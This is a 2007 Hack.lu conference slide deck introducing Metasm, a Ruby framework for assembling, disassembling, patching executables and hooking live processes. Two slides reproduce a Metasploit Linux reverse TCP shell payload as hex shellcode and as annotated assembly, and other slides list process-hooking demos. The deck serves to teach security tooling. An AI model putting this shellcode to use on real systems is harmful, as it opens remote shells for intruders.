Metasm

a ruby (dis)assembler

Yoann Guillot

20 october 2007
 Metasm
Demonstrations

Presentation

I am Yoann Guillot
I work for Sogeti/ESEC in the security R&D lab

Metasm HACK.LU 2007 2 / 23

 Architecture overview
Assembly
Disassembly
Metasm Executable file handling
Demonstrations C compiler
Live process interaction
Use cases
Metasploit 3

Plan

1 Metasm
Architecture overview
Assembly
Disassembly
Executable file handling
C compiler
Live process interaction
Use cases
Metasploit 3

2 Demonstrations
Metasm HACK.LU 2007 3 / 23
 Architecture overview
Assembly
Disassembly
Metasm Executable file handling
Demonstrations C compiler
Live process interaction
Use cases
Metasploit 3

Introduction

Metasm is a full-Ruby standalone framework

To manipulate machine code (static or dynamic)
Multi-CPU (Ia32/MIPS for now)
Multi-OS (Windows/Linux)
distributed under the open-source LGPL license
http://metasm.cr0.org/
still under heavy developpement

Metasm HACK.LU 2007 4 / 23

 Architecture overview
Assembly
Disassembly
Metasm Executable file handling
Demonstrations C compiler
Live process interaction
Use cases
Metasploit 3

Architecture overview

Metasm HACK.LU 2007 5 / 23

 Architecture overview
Assembly
Disassembly
Metasm Executable file handling
Demonstrations C compiler
Live process interaction
Use cases
Metasploit 3

Assembly

EncodedData represents a relocatable binary string

binary data
arbitrary relocations
exports
virtual size
used to dissociate assembly from linking

Metasm HACK.LU 2007 6 / 23

 Architecture overview
Assembly
Disassembly
Metasm Executable file handling
Demonstrations C compiler
Live process interaction
Use cases
Metasploit 3

Assembly

mov eax, dword ptr [toto]

Metasm HACK.LU 2007 7 / 23

 Architecture overview
Assembly
Disassembly
Metasm Executable file handling
Demonstrations C compiler
Live process interaction
Use cases
Metasploit 3

Disassembly

simple yet powerful backtracking engine

emulates standard CPU instructions
follows precisely code flow
currently unfinished
trace data access
handle subfunctions
handle external API calls
minimal arch-specific developpement

Metasm HACK.LU 2007 8 / 23

 Architecture overview
Assembly
Disassembly
Metasm Executable file handling
Demonstrations C compiler
Live process interaction
Use cases
Metasploit 3

Handling executable files

reading
from a file
directly in memory
writing
from scratch
patch an existing exe
currently supported formats: MZ / PE / COFF, ELF / a.out

Metasm HACK.LU 2007 9 / 23

 Architecture overview
Assembly
Disassembly
Metasm Executable file handling
Demonstrations C compiler
Live process interaction
Use cases
Metasploit 3

C Compilation

Metasm includes a complete C parser

features header filtering
basic compiler for Ia32

Metasm HACK.LU 2007 10 / 23

 Architecture overview
Assembly
Disassembly
Metasm Executable file handling
Demonstrations C compiler
Live process interaction
Use cases
Metasploit 3

Live process interaction

String-like process memory abstraction

transparent read/write
Ruby objects wrap the host OS debug API

Metasm HACK.LU 2007 11 / 23

 Architecture overview
Assembly
Disassembly
Metasm Executable file handling
Demonstrations C compiler
Live process interaction
Use cases
Metasploit 3

When is it useful

whenever you want to manipulate machine code or executable

files
it’s easy to hook/rewrite/customize any internal method

Metasm HACK.LU 2007 12 / 23

 Architecture overview
Assembly
Disassembly
Metasm Executable file handling
Demonstrations C compiler
Live process interaction
Use cases
Metasploit 3

Metasploit 3 - before

Metasploit 3 is also written in Ruby

it had very bad machine code support
hexadecimal static shellcodes
hacks to patch the shellcodes with user-specified values
more hacks to link stages

Metasm HACK.LU 2007 13 / 23

 Architecture overview
Assembly
Disassembly
Metasm Executable file handling
Demonstrations C compiler
Live process interaction
Use cases
Metasploit 3

Metasploit 3 - before
[metasploit3/.../reverse tcp.rb]

’Payload’ =>
{
’Offsets’ =>
{
’LHOST’ => [ 0x1a, ’ADDR’ ],
’LPORT’ => [ 0x20, ’n’ ],
},
’Payload’ =>
"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x89\xe1\xcd\x80\x93\x59" +
"\xb0\x3f\xcd\x80\x49\x79\xf9\x5b\x5a\x68\x7f\x00\x00\x01\x66\x68" +
"\xbf\xbf\x43\x66\x53\x89\xe1\xb0\x66\x50\x51\x53\x89\xe1\x43\xcd" +
"\x80\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53" +
"\x89\xe1\xb0\x0b\xcd\x80"
}

Metasm HACK.LU 2007 14 / 23

 Architecture overview
Assembly
Disassembly
Metasm Executable file handling
Demonstrations C compiler
Live process interaction
Use cases
Metasploit 3

Metasploit 3 - now
[metasploit3/.../reverse tcp2.rb]

’Payload’ => {
’Offsets’ => {
’LHOST’ => [ 0, ’ADDR’ ],
’LPORT’ => [ 0, ’n’ ],
},
’Assembly’ => <<EOS
xor ebx, ebx ; @00000000 31db
[...]
pop edx ; @00000018 5a
push LHOST ; @00000019 687f000001
push.i16 LPORT ; @0000001e 6668bfbf
[...]
push ’//sh’
push ’/bin’
[...]
mov al, 0bh ; @00000042 b00b
int 80h ; @00000044 cd80
EOS
}

Metasm HACK.LU 2007 15 / 23

 Architecture overview
Assembly
Disassembly
Metasm Executable file handling
Demonstrations C compiler
Live process interaction
Use cases
Metasploit 3

Metasploit 3 - now

Metasm is now included in Metasploit

shellcodes can be in source from
standard Metasm relocation handling may be used for
shellcode patching/linking
???
Profit !

Metasm HACK.LU 2007 16 / 23

 metasm-shell
Metasm
Exe manipulation
Demonstrations
Live process interaction

Plan

1 Metasm

2 Demonstrations
metasm-shell
Exe manipulation
Live process interaction

Metasm HACK.LU 2007 17 / 23

 metasm-shell
Metasm
Exe manipulation
Demonstrations
Live process interaction

metasm-shell

metasm-shell
adds metasm methods to standard Ruby Strings
offers an interactive assembler shell

Metasm HACK.LU 2007 18 / 23

 metasm-shell
Metasm
Exe manipulation
Demonstrations
Live process interaction

Exe manipulation

reading a MIPS ELF

Metasm HACK.LU 2007 19 / 23

 metasm-shell
Metasm
Exe manipulation
Demonstrations
Live process interaction

Exe manipulation

reading a MIPS ELF

compiling a simple PE [samples/testpe.rb]

Metasm HACK.LU 2007 19 / 23

 metasm-shell
Metasm
Exe manipulation
Demonstrations
Live process interaction

Exe manipulation

reading a MIPS ELF

compiling a simple PE [samples/testpe.rb]

patching a PE [samples/pe-hook.rb]

Metasm HACK.LU 2007 19 / 23

 metasm-shell
Metasm
Exe manipulation
Demonstrations
Live process interaction

Windows process hooking

simple IAT hook [samples/win32hooker.rb]

Metasm HACK.LU 2007 20 / 23

 metasm-shell
Metasm
Exe manipulation
Demonstrations
Live process interaction

Windows process hooking

full-library hook [samples/win32hooker-advanced.rb]

redirect all exported function to a custom hook

Metasm HACK.LU 2007 21 / 23

 metasm-shell
Metasm
Exe manipulation
Demonstrations
Live process interaction

Linux debugging

ptrace wrapper [samples/rubstop.rb]

singlestep, stepover, etc
memory access
PaX compatible

Metasm HACK.LU 2007 22 / 23

 metasm-shell
Metasm
Exe manipulation
Demonstrations
Live process interaction

Linux debugging

ptrace wrapper [samples/rubstop.rb]

singlestep, stepover, etc
memory access
PaX compatible
UI [samples/lindebug.rb]
console-mode only (for now)

Metasm HACK.LU 2007 22 / 23

 metasm-shell
Metasm
Exe manipulation
Demonstrations
Live process interaction

Conclusion

Thanks for listening

Questions ?

Metasm HACK.LU 2007 23 / 23